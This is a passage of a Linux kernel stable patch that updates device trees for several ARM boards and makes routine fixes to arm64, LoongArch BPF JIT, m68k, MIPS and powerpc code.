+ 			msg-size = <0x20000 0x20000>;
+-			cc-size = <0x0>;
++			ecc-size = <16>;
+ 			no-map;
+ 		};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+index c958a8b167303..fd8c0097072ab 100644
+--- a/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8150-sony-xperia-kumano.dtsi
+@@ -33,9 +33,10 @@
+ 		framebuffer: framebuffer@9c000000 {
+ 			compatible = "simple-framebuffer";
+ 			reg = <0 0x9c000000 0 0x2300000>;
+-			width = <1644>;
+-			height = <3840>;
+-			stride = <(1644 * 4)>;
++			/* Griffin BL initializes in 2.5k mode, not 4k */
++			width = <1096>;
++			height = <2560>;
++			stride = <(1096 * 4)>;
+ 			format = "a8r8g8b8";
+ 			/*
+ 			 * That's (going to be) a lot of clocks, but it's necessary due
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts
+index cc650508dc2d6..e6824c8c2774d 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx214.dts
+@@ -17,3 +17,26 @@
+ 	height = <2520>;
+ 	stride = <(1080 * 4)>;
+ };
++
++&pm8350b_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "NC",
++			  "NC",
++			  "NC",
++			  "SNAPSHOT_N",
++			  "NC",
++			  "NC",
++			  "FOCUS_N";
++};
++
++&pm8350c_gpios {
++	gpio-line-names = "FL_STROBE_TRIG_WIDE", /* GPIO_1 */
++			  "FL_STROBE_TRIG_TELE",
++			  "NC",
++			  "NC",
++			  "NC",
++			  "RGBC_IR_PWR_EN",
++			  "NC",
++			  "NC",
++			  "WIDEC_PWR_EN";
++};
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts
+index c74c973a69d2d..c6f402c3ef352 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts
++++ b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami-pdx215.dts
+@@ -12,6 +12,93 @@
+ 	compatible = "sony,pdx215-generic", "qcom,sm8350";
+ };
+ 
++&i2c13 {
++	pmic@75 {
++		compatible = "dlg,slg51000";
++		reg = <0x75>;
++		dlg,cs-gpios = <&pm8350b_gpios 1 GPIO_ACTIVE_HIGH>;
++
++		pinctrl-names = "default";
++		pinctrl-0 = <&cam_pwr_a_cs>;
++
++		regulators {
++			slg51000_a_ldo1: ldo1 {
++				regulator-name = "slg51000_a_ldo1";
++				regulator-min-microvolt = <2400000>;
++				regulator-max-microvolt = <3300000>;
++			};
++
++			slg51000_a_ldo2: ldo2 {
++				regulator-name = "slg51000_a_ldo2";
++				regulator-min-microvolt = <2400000>;
++				regulator-max-microvolt = <3300000>;
++			};
++
++			slg51000_a_ldo3: ldo3 {
++				regulator-name = "slg51000_a_ldo3";
++				regulator-min-microvolt = <1200000>;
++				regulator-max-microvolt = <3750000>;
++			};
++
++			slg51000_a_ldo4: ldo4 {
++				regulator-name = "slg51000_a_ldo4";
++				regulator-min-microvolt = <1200000>;
++				regulator-max-microvolt = <3750000>;
++			};
++
++			slg51000_a_ldo5: ldo5 {
++				regulator-name = "slg51000_a_ldo5";
++				regulator-min-microvolt = <500000>;
++				regulator-max-microvolt = <1200000>;
++			};
++
++			slg51000_a_ldo6: ldo6 {
++				regulator-name = "slg51000_a_ldo6";
++				regulator-min-microvolt = <500000>;
++				regulator-max-microvolt = <1200000>;
++			};
++
++			slg51000_a_ldo7: ldo7 {
++				regulator-name = "slg51000_a_ldo7";
++				regulator-min-microvolt = <1200000>;
++				regulator-max-microvolt = <3750000>;
++			};
++		};
++	};
++};
++
++&pm8350b_gpios {
++	gpio-line-names = "CAM_PWR_A_CS", /* GPIO_1 */
++			  "NC",
++			  "NC",
++			  "NC",
++			  "SNAPSHOT_N",
++			  "CAM_PWR_LD_EN",
++			  "NC",
++			  "FOCUS_N";
++
++	cam_pwr_a_cs: cam-pwr-a-cs-state {
++		pins = "gpio1";
++		function = "normal";
++		qcom,drive-strength = <PMIC_GPIO_STRENGTH_LOW>;
++		power-source = <1>;
++		drive-push-pull;
++		output-high;
++	};
++};
++
++&pm8350c_gpios {
++	gpio-line-names = "FL_STROBE_TRIG_WIDE", /* GPIO_1 */
++			  "FL_STROBE_TRIG_TELE",
++			  "NC",
++			  "WLC_TXPWR_EN",
++			  "NC",
++			  "RGBC_IR_PWR_EN",
++			  "NC",
++			  "NC",
++			  "WIDEC_PWR_EN";
++};
++
+ &tlmm {
+ 	gpio-line-names = "APPS_I2C_0_SDA", /* GPIO_0 */
+ 			  "APPS_I2C_0_SCL",
+diff --git a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi
+index 1f2d660f8f86c..8df6ccbedfae7 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350-sony-xperia-sagami.dtsi
+@@ -3,6 +3,7 @@
+  * Copyright (c) 2021, Konrad Dybcio <konrad.dybcio@somainline.org>
+  */
+ 
++#include <dt-bindings/pinctrl/qcom,pmic-gpio.h>
+ #include <dt-bindings/regulator/qcom,rpmh-regulator.h>
+ #include "sm8350.dtsi"
+ #include "pm8350.dtsi"
+@@ -48,7 +49,35 @@
+ 	gpio-keys {
+ 		compatible = "gpio-keys";
+ 
+-		/* For reasons still unknown, GAssist key and Camera Focus/Shutter don't work.. */
++		pinctrl-names = "default";
++		pinctrl-0 = <&focus_n &snapshot_n &vol_down_n &g_assist_n>;
++
++		key-camera-focus {
++			label = "Camera Focus";
++			linux,code = <KEY_CAMERA_FOCUS>;
++			gpios = <&pm8350b_gpios 8 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
++
++		key-camera-snapshot {
++			label = "Camera Snapshot";
++			linux,code = <KEY_CAMERA>;
++			gpios = <&pm8350b_gpios 5 GPIO_ACTIVE_LOW>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
++
++		key-google-assist {
++			label = "Google Assistant Key";
++			gpios = <&pm8350_gpios 9 GPIO_ACTIVE_LOW>;
++			linux,code = <KEY_LEFTMETA>;
++			debounce-interval = <15>;
++			linux,can-disable;
++			wakeup-source;
++		};
+ 
+ 		key-vol-down {
+ 			label = "Volume Down";
+@@ -56,7 +85,7 @@
+ 			gpios = <&pmk8350_gpios 3 GPIO_ACTIVE_LOW>;
+ 			debounce-interval = <15>;
+ 			linux,can-disable;
+-			gpio-key,wakeup;
++			wakeup-source;
+ 		};
+ 	};
+ 
+@@ -506,7 +535,6 @@
+ 	clock-frequency = <100000>;
+ 
+ 	/* Qualcomm PM8008i/PM8008j (?) @ 8, 9, c, d */
+-	/* Dialog SLG51000 CMIC @ 75 */
+ };
+ 
+ &i2c15 {
+@@ -534,6 +562,60 @@
+ 	firmware-name = "qcom/sm8350/Sony/sagami/modem.mbn";
+ };
+ 
++&pm8350_gpios {
++	gpio-line-names = "ASSIGN1_THERM", /* GPIO_1 */
++			  "LCD_ID",
++			  "SDR_MMW_THERM",
++			  "RF_ID",
++			  "NC",
++			  "FP_LDO_EN",
++			  "SP_ARI_PWR_ALARM",
++			  "NC",
++			  "G_ASSIST_N",
++			  "PM8350_OPTION"; /* GPIO_10 */
++
++	g_assist_n: g-assist-n-state {
++		pins = "gpio9";
++		function = "normal";
++		power-source = <1>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
++&pm8350b_gpios {
++	snapshot_n: snapshot-n-state {
++		pins = "gpio5";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++
++	focus_n: focus-n-state {
++		pins = "gpio8";
++		function = "normal";
++		power-source = <0>;
++		input-enable;
++		bias-pull-up;
++	};
++};
++
++&pmk8350_gpios {
++	gpio-line-names = "NC", /* GPIO_1 */
++			  "NC",
++			  "VOL_DOWN_N",
++			  "PMK8350_OPTION";
++
++	vol_down_n: vol-down-n-state {
++		pins = "gpio3";
++		function = "normal";
++		power-source = <0>;
++		bias-pull-up;
++		input-enable;
++	};
++};
++
+ &pmk8350_rtc {
+ 	status = "okay";
+ };
+diff --git a/arch/arm64/boot/dts/qcom/sm8350.dtsi b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+index fb3cd20a82b5e..646c64f0d1e28 100644
+--- a/arch/arm64/boot/dts/qcom/sm8350.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8350.dtsi
+@@ -1043,8 +1043,6 @@
+ 				interrupts = <GIC_SPI 604 IRQ_TYPE_LEVEL_HIGH>;
+ 				power-domains = <&rpmhpd SM8350_CX>;
+ 				operating-points-v2 = <&qup_opp_table_100mhz>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi
+index 38256226d2297..e437e9a12069f 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450-sony-xperia-nagara.dtsi
+@@ -534,17 +534,17 @@
+ };
+ 
+ &remoteproc_adsp {
+-	firmware-name = "qcom/sm8350/Sony/nagara/adsp.mbn";
++	firmware-name = "qcom/sm8450/Sony/nagara/adsp.mbn";
+ 	status = "okay";
+ };
+ 
+ &remoteproc_cdsp {
+-	firmware-name = "qcom/sm8350/Sony/nagara/cdsp.mbn";
++	firmware-name = "qcom/sm8450/Sony/nagara/cdsp.mbn";
+ 	status = "okay";
+ };
+ 
+ &remoteproc_slpi {
+-	firmware-name = "qcom/sm8350/Sony/nagara/slpi.mbn";
++	firmware-name = "qcom/sm8450/Sony/nagara/slpi.mbn";
+ 	status = "okay";
+ };
+ 
+diff --git a/arch/arm64/boot/dts/qcom/sm8450.dtsi b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+index 570475040d95c..f57980a32b433 100644
+--- a/arch/arm64/boot/dts/qcom/sm8450.dtsi
++++ b/arch/arm64/boot/dts/qcom/sm8450.dtsi
+@@ -997,8 +997,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart20_default>;
+ 				interrupts = <GIC_SPI 587 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 
+@@ -1391,8 +1389,6 @@
+ 				pinctrl-names = "default";
+ 				pinctrl-0 = <&qup_uart7_tx>, <&qup_uart7_rx>;
+ 				interrupts = <GIC_SPI 608 IRQ_TYPE_LEVEL_HIGH>;
+-				#address-cells = <1>;
+-				#size-cells = <0>;
+ 				status = "disabled";
+ 			};
+ 		};
+@@ -2263,7 +2259,7 @@
+ 			reg = <0 0x33b0000 0 0x2000>;
+ 			interrupts-extended = <&intc GIC_SPI 496 IRQ_TYPE_LEVEL_HIGH>,
+ 					      <&intc GIC_SPI 520 IRQ_TYPE_LEVEL_HIGH>;
+-			interrupt-names = "core", "wake";
++			interrupt-names = "core", "wakeup";
+ 
+ 			clocks = <&vamacro>;
+ 			clock-names = "iface";
+diff --git a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+index 8166e3c1ff4e5..cafde91b4721b 100644
+--- a/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
++++ b/arch/arm64/boot/dts/renesas/beacon-renesom-baseboard.dtsi
+@@ -437,20 +437,6 @@
+ 		};
+ 	};
+ 
+-	/* 0 - lcd_reset */
+-	/* 1 - lcd_pwr */
+-	/* 2 - lcd_select */
+-	/* 3 - backlight-enable */
+-	/* 4 - Touch_shdwn */
+-	/* 5 - LCD_H_pol */
+-	/* 6 - lcd_V_pol */
+-	gpio_exp1: gpio@20 {
+-		compatible = "onnn,pca9654";
+-		reg = <0x20>;
+-		gpio-controller;
+-		#gpio-cells = <2>;
+-	};
+-
+ 	touchscreen@26 {
+ 		compatible = "ilitek,ili2117";
+ 		reg = <0x26>;
+@@ -482,6 +468,16 @@
+ 			};
+ 		};
+ 	};
++
++	gpio_exp1: gpio@70 {
++		compatible = "nxp,pca9538";
++		reg = <0x70>;
++		gpio-controller;
++		#gpio-cells = <2>;
++		gpio-line-names = "lcd_reset", "lcd_pwr", "lcd_select",
++				  "backlight-enable", "Touch_shdwn",
++				  "LCD_H_pol", "lcd_V_pol";
++	};
+ };
+ 
+ &lvds0 {
+diff --git a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+index 072903649d6ee..ae1ec58117c35 100644
+--- a/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-am62-main.dtsi
+@@ -413,7 +413,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 141 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 172 0>;
++		clocks = <&k3_clks 141 0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -424,7 +424,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 142 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 173 0>;
++		clocks = <&k3_clks 142 0>;
+ 		status = "disabled";
+ 	};
+ 
+@@ -435,7 +435,7 @@
+ 		#address-cells = <1>;
+ 		#size-cells = <0>;
+ 		power-domains = <&k3_pds 143 TI_SCI_PD_EXCLUSIVE>;
+-		clocks = <&k3_clks 174 0>;
++		clocks = <&k3_clks 143 0>;
+ 		status = "disabled";
+ 	};
+ 
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+index 6240856e48631..0d39d6b8cc0ca 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
++++ b/arch/arm64/boot/dts/ti/k3-j7200-common-proc-board.dts
+@@ -80,7 +80,7 @@
+ 	};
+ };
+ 
+-&wkup_pmx0 {
++&wkup_pmx2 {
+ 	mcu_cpsw_pins_default: mcu-cpsw-pins-default {
+ 		pinctrl-single,pins = <
+ 			J721E_WKUP_IOPAD(0x0068, PIN_OUTPUT, 0) /* MCU_RGMII1_TX_CTL */
+diff --git a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+index fe669deba4896..de56a0165bd0c 100644
+--- a/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
++++ b/arch/arm64/boot/dts/ti/k3-j7200-mcu-wakeup.dtsi
+@@ -56,7 +56,34 @@
+ 	wkup_pmx0: pinctrl@4301c000 {
+ 		compatible = "pinctrl-single";
+ 		/* Proxy 0 addressing */
+-		reg = <0x00 0x4301c000 0x00 0x178>;
++		reg = <0x00 0x4301c000 0x00 0x34>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx1: pinctrl@0x4301c038 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c038 0x00 0x8>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx2: pinctrl@0x4301c068 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c068 0x00 0xec>;
++		#pinctrl-cells = <1>;
++		pinctrl-single,register-width = <32>;
++		pinctrl-single,function-mask = <0xffffffff>;
++	};
++
++	wkup_pmx3: pinctrl@0x4301c174 {
++		compatible = "pinctrl-single";
++		/* Proxy 0 addressing */
++		reg = <0x00 0x4301c174 0x00 0x20>;
+ 		#pinctrl-cells = <1>;
+ 		pinctrl-single,register-width = <32>;
+ 		pinctrl-single,function-mask = <0xffffffff>;
+diff --git a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+index 4325cb8526edc..f92df478f0eea 100644
+--- a/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
++++ b/arch/arm64/boot/dts/xilinx/zynqmp.dtsi
+@@ -858,6 +858,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x860>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+@@ -884,6 +885,7 @@
+ 				clock-names = "bus_early", "ref";
+ 				iommus = <&smmu 0x861>;
+ 				snps,quirk-frame-length-adjustment = <0x20>;
++				snps,resume-hs-terminations;
+ 				/* dma-coherent; */
+ 			};
+ 		};
+diff --git a/arch/arm64/kernel/acpi.c b/arch/arm64/kernel/acpi.c
+index 378453faa87e1..dba8fcec7f33d 100644
+--- a/arch/arm64/kernel/acpi.c
++++ b/arch/arm64/kernel/acpi.c
+@@ -435,10 +435,6 @@ int acpi_ffh_address_space_arch_setup(void *handler_ctxt, void **region_ctxt)
+ 	enum arm_smccc_conduit conduit;
+ 	struct acpi_ffh_data *ffh_ctxt;
+ 
+-	ffh_ctxt = kzalloc(sizeof(*ffh_ctxt), GFP_KERNEL);
+-	if (!ffh_ctxt)
+-		return -ENOMEM;
+-
+ 	if (arm_smccc_get_version() < ARM_SMCCC_VERSION_1_2)
+ 		return -EOPNOTSUPP;
+ 
+@@ -448,6 +444,10 @@ int acpi_ffh_address_space_arch_setup(void *handler_ctxt, void **region_ctxt)
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	ffh_ctxt = kzalloc(sizeof(*ffh_ctxt), GFP_KERNEL);
++	if (!ffh_ctxt)
++		return -ENOMEM;
++
+ 	if (conduit == SMCCC_CONDUIT_SMC) {
+ 		ffh_ctxt->invoke_ffh_fn = __arm_smccc_smc;
+ 		ffh_ctxt->invoke_ffh64_fn = arm_smccc_1_2_smc;
+diff --git a/arch/arm64/kernel/cpufeature.c b/arch/arm64/kernel/cpufeature.c
+index a77315b338e61..ee40dca9f28ef 100644
+--- a/arch/arm64/kernel/cpufeature.c
++++ b/arch/arm64/kernel/cpufeature.c
+@@ -2777,7 +2777,7 @@ static const struct arm64_cpu_capabilities arm64_elf_hwcaps[] = {
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_FP_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_FPHP),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 0, CAP_HWCAP, KERNEL_HWCAP_ASIMD),
+ 	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_AdvSIMD_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_ASIMDHP),
+-	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_SIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
++	HWCAP_CAP(SYS_ID_AA64PFR0_EL1, ID_AA64PFR0_EL1_DIT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DIT),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_DCPOP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_DPB_SHIFT, 4, FTR_UNSIGNED, 2, CAP_HWCAP, KERNEL_HWCAP_DCPODP),
+ 	HWCAP_CAP(SYS_ID_AA64ISAR1_EL1, ID_AA64ISAR1_EL1_JSCVT_SHIFT, 4, FTR_UNSIGNED, 1, CAP_HWCAP, KERNEL_HWCAP_JSCVT),
+diff --git a/arch/arm64/mm/copypage.c b/arch/arm64/mm/copypage.c
+index 8dd5a8fe64b4f..4aadcfb017545 100644
+--- a/arch/arm64/mm/copypage.c
++++ b/arch/arm64/mm/copypage.c
+@@ -22,7 +22,8 @@ void copy_highpage(struct page *to, struct page *from)
+ 	copy_page(kto, kfrom);
+ 
+ 	if (system_supports_mte() && page_mte_tagged(from)) {
+-		page_kasan_tag_reset(to);
++		if (kasan_hw_tags_enabled())
++			page_kasan_tag_reset(to);
+ 		/* It's a new page, shouldn't have been tagged yet */
+ 		WARN_ON_ONCE(!try_page_mte_tagging(to));
+ 		mte_copy_page_tags(kto, kfrom);
+diff --git a/arch/arm64/tools/sysreg b/arch/arm64/tools/sysreg
+index 184e58fd5631a..e8fb6684d7f3c 100644
+--- a/arch/arm64/tools/sysreg
++++ b/arch/arm64/tools/sysreg
+@@ -689,17 +689,17 @@ EndEnum
+ Enum	11:8	FPDP
+ 	0b0000	NI
+ 	0b0001	VFPv2
+-	0b0001	VFPv3
++	0b0010	VFPv3
+ EndEnum
+ Enum	7:4	FPSP
+ 	0b0000	NI
+ 	0b0001	VFPv2
+-	0b0001	VFPv3
++	0b0010	VFPv3
+ EndEnum
+ Enum	3:0	SIMDReg
+ 	0b0000	NI
+ 	0b0001	IMP_16x64
+-	0b0001	IMP_32x64
++	0b0010	IMP_32x64
+ EndEnum
+ EndSysreg
+ 
+@@ -718,7 +718,7 @@ EndEnum
+ Enum	23:20	SIMDHP
+ 	0b0000	NI
+ 	0b0001	SIMDHP
+-	0b0001	SIMDHP_FLOAT
++	0b0010	SIMDHP_FLOAT
+ EndEnum
+ Enum	19:16	SIMDSP
+ 	0b0000	NI
+diff --git a/arch/loongarch/net/bpf_jit.c b/arch/loongarch/net/bpf_jit.c
+index c4b1947ebf768..288003a9f0cae 100644
+--- a/arch/loongarch/net/bpf_jit.c
++++ b/arch/loongarch/net/bpf_jit.c
+@@ -841,7 +841,7 @@ static int build_insn(const struct bpf_insn *insn, struct jit_ctx *ctx, bool ext
+ 		if (ret < 0)
+ 			return ret;
+ 
+-		move_imm(ctx, t1, func_addr, is32);
++		move_addr(ctx, t1, func_addr);
+ 		emit_insn(ctx, jirl, t1, LOONGARCH_GPR_RA, 0);
+ 		move_reg(ctx, regmap[BPF_REG_0], LOONGARCH_GPR_A0);
+ 		break;
+diff --git a/arch/loongarch/net/bpf_jit.h b/arch/loongarch/net/bpf_jit.h
+index ca708024fdd3e..c335dc4eed370 100644
+--- a/arch/loongarch/net/bpf_jit.h
++++ b/arch/loongarch/net/bpf_jit.h
+@@ -82,6 +82,27 @@ static inline void emit_sext_32(struct jit_ctx *ctx, enum loongarch_gpr reg, boo
+ 	emit_insn(ctx, addiw, reg, reg, 0);
+ }
+ 
++static inline void move_addr(struct jit_ctx *ctx, enum loongarch_gpr rd, u64 addr)
++{
++	u64 imm_11_0, imm_31_12, imm_51_32, imm_63_52;
++
++	/* lu12iw rd, imm_31_12 */
++	imm_31_12 = (addr >> 12) & 0xfffff;
++	emit_insn(ctx, lu12iw, rd, imm_31_12);
++
++	/* ori rd, rd, imm_11_0 */
++	imm_11_0 = addr & 0xfff;
++	emit_insn(ctx, ori, rd, rd, imm_11_0);
++
++	/* lu32id rd, imm_51_32 */
++	imm_51_32 = (addr >> 32) & 0xfffff;
++	emit_insn(ctx, lu32id, rd, imm_51_32);
++
++	/* lu52id rd, rd, imm_63_52 */
++	imm_63_52 = (addr >> 52) & 0xfff;
++	emit_insn(ctx, lu52id, rd, rd, imm_63_52);
++}
++
+ static inline void move_imm(struct jit_ctx *ctx, enum loongarch_gpr rd, long imm, bool is32)
+ {
+ 	long imm_11_0, imm_31_12, imm_51_32, imm_63_52, imm_51_0, imm_51_31;
+diff --git a/arch/m68k/68000/entry.S b/arch/m68k/68000/entry.S
+index 997b549330156..7d63e2f1555a0 100644
+--- a/arch/m68k/68000/entry.S
++++ b/arch/m68k/68000/entry.S
+@@ -45,6 +45,8 @@ do_trace:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d1
+ 	movel	#-ENOSYS,%d0
+ 	cmpl	#NR_syscalls,%d1
+diff --git a/arch/m68k/Kconfig.devices b/arch/m68k/Kconfig.devices
+index 6a87b4a5fcac2..e6e3efac18407 100644
+--- a/arch/m68k/Kconfig.devices
++++ b/arch/m68k/Kconfig.devices
+@@ -19,6 +19,7 @@ config HEARTBEAT
+ # We have a dedicated heartbeat LED. :-)
+ config PROC_HARDWARE
+ 	bool "/proc/hardware support"
++	depends on PROC_FS
+ 	help
+ 	  Say Y here to support the /proc/hardware file, which gives you
+ 	  access to information about the machine you're running on,
+diff --git a/arch/m68k/coldfire/entry.S b/arch/m68k/coldfire/entry.S
+index 9f337c70243a3..35104c5417ff4 100644
+--- a/arch/m68k/coldfire/entry.S
++++ b/arch/m68k/coldfire/entry.S
+@@ -90,6 +90,8 @@ ENTRY(system_call)
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0
++	jeq	ret_from_exception
+ 	movel	%d3,%a0
+ 	jbsr	%a0@
+ 	movel	%d0,%sp@(PT_OFF_D0)		/* save the return value */
+diff --git a/arch/m68k/kernel/entry.S b/arch/m68k/kernel/entry.S
+index 18f278bdbd218..42879e6eb651d 100644
+--- a/arch/m68k/kernel/entry.S
++++ b/arch/m68k/kernel/entry.S
+@@ -184,9 +184,12 @@ do_trace_entry:
+ 	jbsr	syscall_trace_enter
+ 	RESTORE_SWITCH_STACK
+ 	addql	#4,%sp
++	addql	#1,%d0			| optimization for cmpil #-1,%d0
++	jeq	ret_from_syscall
+ 	movel	%sp@(PT_OFF_ORIG_D0),%d0
+ 	cmpl	#NR_syscalls,%d0
+ 	jcs	syscall
++	jra	ret_from_syscall
+ badsys:
+ 	movel	#-ENOSYS,%sp@(PT_OFF_D0)
+ 	jra	ret_from_syscall
+diff --git a/arch/mips/boot/dts/ingenic/ci20.dts b/arch/mips/boot/dts/ingenic/ci20.dts
+index f38c39572a9e8..8f21d2304737c 100644
+--- a/arch/mips/boot/dts/ingenic/ci20.dts
++++ b/arch/mips/boot/dts/ingenic/ci20.dts
+@@ -113,7 +113,7 @@
+ 		regulator-min-microvolt = <5000000>;
+ 		regulator-max-microvolt = <5000000>;
+ 
+-		gpio = <&gpf 14 GPIO_ACTIVE_LOW>;
++		gpio = <&gpf 15 GPIO_ACTIVE_LOW>;
+ 		enable-active-high;
+ 	};
+ };
+diff --git a/arch/mips/include/asm/syscall.h b/arch/mips/include/asm/syscall.h
+index 25fa651c937d5..ebdf4d910af2f 100644
+--- a/arch/mips/include/asm/syscall.h
++++ b/arch/mips/include/asm/syscall.h
+@@ -38,7 +38,7 @@ static inline bool mips_syscall_is_indirect(struct task_struct *task,
+ static inline long syscall_get_nr(struct task_struct *task,
+ 				  struct pt_regs *regs)
+ {
+-	return current_thread_info()->syscall;
++	return task_thread_info(task)->syscall;
+ }
+ 
+ static inline void mips_syscall_update_nr(struct task_struct *task,
+diff --git a/arch/powerpc/Makefile b/arch/powerpc/Makefile
+index dc4cbf0a5ca95..4fd630efe39d3 100644
+--- a/arch/powerpc/Makefile
++++ b/arch/powerpc/Makefile
+@@ -90,7 +90,7 @@ aflags-$(CONFIG_CPU_LITTLE_ENDIAN)	+= -mlittle-endian
+ 
+ ifeq ($(HAS_BIARCH),y)
+ KBUILD_CFLAGS	+= -m$(BITS)
+-KBUILD_AFLAGS	+= -m$(BITS) -Wl,-a$(BITS)
++KBUILD_AFLAGS	+= -m$(BITS)
+ KBUILD_LDFLAGS	+= -m elf$(BITS)$(LDEMULATION)
+ endif
+ 
+diff --git a/arch/powerpc/mm/book3s64/radix_tlb.c b/arch/powerpc/mm/book3s64/radix_tlb.c
+index 4e29b619578c1..6d7a1ef723e69 100644
+--- a/arch/powerpc/mm/book3s64/radix_tlb.c
++++ b/arch/powerpc/mm/book3s64/radix_tlb.c
+@@ -1179,15 +1179,12 @@ static inline void __radix__flush_tlb_range(struct mm_struct *mm,
+ 			}
+ 		}
+ 	} else {
+-		bool hflush = false;
++		bool hflush;
+ 		unsigned long hstart, hend;
+ 
+-		if (IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE)) {
+-			hstart = (start + PMD_SIZE - 1) & PMD_MASK;
+-			hend = end & PMD_MASK;
+-			if (hstart < hend)
+-				hflush = true;
+-		}
++		hstart = (start + PMD_SIZE - 1) & PMD_MASK;
++		hend = end & PMD_MASK;
++		hflush = IS_ENABLED(CONFIG_TRANSPARENT_HUGEPAGE) && hstart < hend;
+ 
+ 		if (type == FLUSH_TYPE_LOCAL) {
+ 			asm volatile("ptesync": : :"memory");
+diff --git a/arch/riscv/Kconfig b/arch/riscv/Kconfig
+index e2b656043abf3..ee0d39b267946 100644
